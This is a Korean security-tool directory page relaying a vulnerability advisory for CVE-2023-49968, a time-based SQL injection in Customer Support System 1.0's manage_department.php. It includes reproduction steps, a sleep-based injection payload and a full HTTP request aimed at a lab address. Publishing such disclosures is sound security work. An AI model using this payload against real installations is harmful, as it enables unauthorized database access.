Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-49968 — 고객 지원 시스템 1.0 - manage_department.php의 "id" URL 매개변수를 통한 SQL 인젝션 취약점 | Kitploit
도구/GitHubGitHub/geraldoalcantara/cve-2023-49968
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingDatabase Security
GitHubgeraldoalcantara/cve-2023-49968

CVE-2023-49968

고객 지원 시스템 1.0 - manage_department.php의 "id" URL 매개변수를 통한 SQL 인젝션 취약점

저장소 보기
2년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-49968

Customer Support System 1.0 - manage_department.php의 "id" URL 매개변수를 통한 SQL 인젝션 취약점

설명: Customer Support System 버전 1에 SQL 인젝션 취약점이 존재합니다. 악의적인 공격자는 부서를 편집하는 동안 'id' URL 매개변수를 조작하여 MySQL 데이터베이스에서 SQL 명령을 실행할 수 있습니다.

취약한 제품 버전: Customer Support System 1.0
CVE 작성자: Geraldo Alcântara
날짜: 28/11/2023
확인 날짜: 19/12/2023
CVE: CVE-2023-49968
테스트 환경: Windows

재현 단계:

1- 애플리케이션에 로그인합니다.
2- 부서 편집 페이지로 이동하여 "Action" 버튼을 클릭하고 "Edit"를 선택합니다.
3- 'id' 매개변수가 전달되어 악성 페이로드를 삽입할 수 있게 됩니다. 페이로드: (select*from(select(sleep(5)))a)

요청:

root@kitploit:~
GET /customer_support/manage_department.php?id=(select*from(select(sleep(5)))a) HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=department_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n

발견자/크레딧:
Geraldo Alcântara

도구 다운로드